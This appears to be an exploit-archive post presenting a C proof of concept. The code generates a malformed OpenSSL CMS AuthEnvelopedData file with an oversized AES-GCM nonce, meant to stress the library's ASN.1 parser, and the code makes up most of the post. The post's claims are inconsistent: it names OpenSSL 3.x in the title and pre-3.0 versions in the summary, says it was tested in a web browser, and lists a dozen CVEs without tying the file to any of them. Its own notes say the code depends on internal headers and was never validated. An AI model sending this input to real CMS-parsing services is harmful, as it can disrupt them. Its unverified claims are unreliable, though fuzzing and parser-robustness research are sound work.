OpenSSL 3.x Malicious AES-GCM ASN.1 Parameter Injection

=============================================================================================================================================
| # Title OpenSSL 3.x Malicious AES-GCM ASN.1 Parameter Injection

=============================================================================================================================================
| # Title : OpenSSL 3.x Malicious AES-GCM ASN.1 Parameter Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.openssl-library.org/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/214422/ & CVE-2025-11187, CVE-2025-15467, CVE-2025-15468, CVE-2025-15469, CVE-2025-66199,
CVE-2025-68160, CVE-2025-69418, CVE-2025-69419, CVE-2025-69420, CVE-2025-69421,
CVE-2026-22795, CVE-2026-22796

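[+] Summary : This C code is a security research Proof of Concept (PoC) targeting OpenSSL's CMS (Cryptographic Message Syntax) handling.
It programmatically creates a syntactically valid CMS AuthEnvelopedData object using AES-256-GCM, then injects a custom-crafted ASN.1 AES_GCM_PARAMETERS
sequence with an abnormally large nonce. The goal is to test or reproduce ASN.1 parsing weaknesses and robustness issues in OpenSSL (notably versions prior to 3.0,
where internal CMS structures were still accessible). The generated output (exploit_fixed.cms) is valid in format but intentionally unusual,
intended for defensive testing, fuzzing, or vulnerability analysis, not for real-world exploitation.
The listing reads cms->d.authEnvelopedData directly, so it builds only where OpenSSL's internal CMS structure definitions are visible, not against the installed public headers.
The page does not say which of the referenced CVEs the file relates to and shows no parser output for it, so the result should be treated as unvalidated test input.
The exposure for defenders is any service that parses CMS or PKCS#7 data from untrusted senders; the vendor advisories for the referenced CVEs list the fixed releases.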

[+] POC :

#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <openssl/asn1.h>
#include <openssl/asn1t.h>
#include <openssl/cms.h>
#include <openssl/err.h>
#include <openssl/x509.h>

/*
 * In-memory form of the AES-GCM algorithm parameters that this listing
 * encodes: a nonce octet string and an optional ICV length.
 */
typedef struct {
/* Required member of the template below. */
ASN1_OCTET_STRING *nonce;
/* Optional member of the template below; not assigned by the code shown here. */
ASN1_INTEGER *icvLen;
} AES_GCM_PARAMETERS;

/* ASN.1 template: SEQUENCE { nonce OCTET STRING, icvLen INTEGER OPTIONAL }. */
ASN1_SEQUENCE(AES_GCM_PARAMETERS) = {
ASN1_SIMPLE(AES_GCM_PARAMETERS, nonce, ASN1_OCTET_STRING),
ASN1_OPT(AES_GCM_PARAMETERS, icvLen, ASN1_INTEGER)
} ASN1_SEQUENCE_END(AES_GCM_PARAMETERS)

/*
 * Generates AES_GCM_PARAMETERS_new(), AES_GCM_PARAMETERS_free() and the
 * d2i_/i2d_ codec functions for the template above.
 */
IMPLEMENT_ASN1_FUNCTIONS(AES_GCM_PARAMETERS)

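/**
 * Encode an AES_GCM_PARAMETERS sequence whose nonce is nonce_size bytes of
 * 0x41 and wrap the DER bytes in an ASN1_TYPE tagged V_ASN1_SEQUENCE.
 *
 * The nonce length is chosen by the caller and is not limited to the sizes
 * AES-GCM normally uses; the result is parser test input, not usable
 * cipher parameters.
 *
 * @param nonce_size  Number of filler bytes in the nonce. Must fit in an int,
 *                    because the OpenSSL string setters take int lengths.
 * @return A newly allocated ASN1_TYPE owned by the caller, or NULL on any
 *         allocation or encoding failure.
 */
ASN1_TYPE *build_malicious_parameter(size_t nonce_size) {
    AES_GCM_PARAMETERS *params = NULL;
    unsigned char *buf = NULL;
    unsigned char *der = NULL;
    ASN1_STRING *seq = NULL;
    ASN1_TYPE *type = NULL;
    int len;

    /* The setters below take an int length; refuse values that would be
     * truncated or turn negative in the conversion. */
    if (nonce_size > (size_t)INT_MAX) {
        return NULL;
    }

    params = AES_GCM_PARAMETERS_new();
    if (!params) {
        return NULL;
    }

    /* A non-optional template member is normally allocated by _new();
     * allocate only when it is absent so an existing object is not leaked. */
    if (!params->nonce) {
        params->nonce = ASN1_OCTET_STRING_new();
        if (!params->nonce) {
            goto done;
        }
    }

    buf = OPENSSL_malloc(nonce_size);
    if (!buf) {
        goto done;
    }
    memset(buf, 0x41, nonce_size);

    /* The setter copies buf, so buf is released in the common exit path. */
    if (!ASN1_OCTET_STRING_set(params->nonce, buf, (int)nonce_size)) {
        goto done;
    }

    len = i2d_AES_GCM_PARAMETERS(params, &der);
    if (len <= 0) {
        goto done;
    }

    seq = ASN1_STRING_new();
    if (!seq) {
        goto done;
    }
    if (!ASN1_STRING_set(seq, der, len)) {
        goto done;
    }

    type = ASN1_TYPE_new();
    if (!type) {
        goto done;
    }

    /* ASN1_TYPE_set() takes ownership of seq; drop the local reference so
     * the cleanup below does not free it a second time. */
    ASN1_TYPE_set(type, V_ASN1_SEQUENCE, seq);
    seq = NULL;

done:
    /* Every free function used here accepts NULL. */
    ASN1_STRING_free(seq);
    OPENSSL_free(der);
    OPENSSL_free(buf);
    AES_GCM_PARAMETERS_free(params);
    return type;
}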

/*
 * Create a CMS AuthEnvelopedData ContentInfo for AES-256-GCM, replace its
 * content-encryption algorithm parameters with the sequence built by
 * build_malicious_parameter(nonce_size), and DER-encode the result.
 *
 * nonce_size  Passed through to build_malicious_parameter().
 * out_len     Receives the return value of i2d_CMS_ContentInfo(); it is
 *             <= 0 when encoding failed.
 *
 * Returns the DER buffer written by i2d_CMS_ContentInfo(), which main()
 * releases with OPENSSL_free(), or NULL if the CMS object could not be
 * created.
 *
 * The code shown adds no recipient and no content to the CMS object.
 *
 * NOTE(review): nothing in this listing parses the output back, so whether
 * the file encodes as the page's summary describes is unverified.
 */
unsigned char *generate_valid_cms_poc(size_t nonce_size, int *out_len) {
CMS_ContentInfo *cms = NULL;
unsigned char *der = NULL;

cms = CMS_AuthEnvelopedData_create(EVP_aes_256_gcm());
if (!cms) {
/* Dump the OpenSSL error queue so the failure reason is visible. */
ERR_print_errors_fp(stderr);
return NULL;
}

/*
 * Direct member access into CMS_ContentInfo. NOTE(review): this needs the
 * library-internal structure definitions; the public <openssl/cms.h>
 * declares the type as opaque - confirm the intended build setup.
 */
CMS_AuthEnvelopedData *aed = cms->d.authEnvelopedData;
if (aed && aed->authEncryptedContentInfo) {
X509_ALGOR *alg =
aed->authEncryptedContentInfo->contentEncryptionAlgorithm;

ASN1_TYPE *param = build_malicious_parameter(nonce_size);
/* NOTE(review): when alg is NULL but param is not, param is never freed. */
if (alg && param) {
/*
 * Numeric OID only (second argument 1 disables name lookup).
 * NOTE(review): the result is not checked for NULL before use.
 */
ASN1_OBJECT *obj =
OBJ_txt2obj("2.16.840.1.101.3.4.1.46", 1);

/* Hands obj and param to alg; neither is freed separately below. */
X509_ALGOR_set0(alg, obj, V_ASN1_SEQUENCE, param);
}
}

/* With der == NULL the encoder allocates the output buffer itself. */
*out_len = i2d_CMS_ContentInfo(cms, &der);
if (*out_len <= 0) {
ERR_print_errors_fp(stderr);
}

CMS_ContentInfo_free(cms);
return der;
}

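/**
 * Command-line entry point: generate the CMS test object and write it to
 * exploit_fixed.cms in the current directory.
 *
 * argv[1] (optional) is the nonce length in bytes, default 2048. It must be
 * a decimal integer in 1..INT_MAX; anything else is rejected instead of
 * being silently converted.
 *
 * @return 0 on success, 1 on invalid input, generation failure or I/O error.
 */
int main(int argc, char **argv) {
    int len = 0;
    size_t sz = 2048;

    if (argc > 1) {
        char *end = NULL;
        long parsed;

        /* strtol reports overflow and trailing garbage; atoi does neither. */
        errno = 0;
        parsed = strtol(argv[1], &end, 10);
        if (errno != 0 || end == argv[1] || *end != '\0' ||
            parsed <= 0 || parsed > INT_MAX) {
            fprintf(stderr, "[-] Invalid nonce size: %s\n", argv[1]);
            return 1;
        }
        sz = (size_t)parsed;
    }

    unsigned char *cms = generate_valid_cms_poc(sz, &len);
    if (!cms || len <= 0) {
        fprintf(stderr, "[-] Generation failed\n");
        /* A buffer may exist even when the length is invalid. */
        OPENSSL_free(cms);
        return 1;
    }

    FILE *f = fopen("exploit_fixed.cms", "wb");
    if (!f) {
        perror("[-] fopen");
        OPENSSL_free(cms);
        return 1;
    }

    /* A short write or a failed flush on close both mean a truncated file. */
    size_t written = fwrite(cms, 1, (size_t)len, f);
    int close_rc = fclose(f);
    OPENSSL_free(cms);

    if (written != (size_t)len || close_rc != 0) {
        fprintf(stderr, "[-] Write failed\n");
        return 1;
    }

    printf("[+] exploit_fixed.cms generated (%d bytes)\n", len);
    return 0;
}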
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================